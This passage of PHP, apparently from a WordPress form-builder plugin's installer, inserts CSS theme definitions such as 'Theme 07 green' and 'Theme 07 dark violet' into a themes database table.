#00709F 39%, #006A97 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0072A2), color-stop(39%, #00709F), color-stop(100%, #006A97)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0072A2 0%, #00709F 39%, #006A97 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0072A2 0%, #00709F 39%, #006A97 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(25, \'Theme 07 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #00A25B;\r\nmargin-bottom: 10px;\r\ncolor: #00A25B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #00A25B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #00A25B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #00A25B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #00A25B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #00A25B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #00A25B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00A25B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00A15B ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00A25B ), color-stop(39%, #00A15A ), color-stop(100%, #00A15B )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00A25B 0%, #00A15A 39%, #00A15B 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00A25B 0%, #00A15A  39%, #00A15B 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00A25B 0%, #00A15A 39%, #00A15B 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(26, \'Theme 07 dark violet\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #33016B;\r\nmargin-bottom: 10px;\r\ncolor: #33016B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #33016B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #33016B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 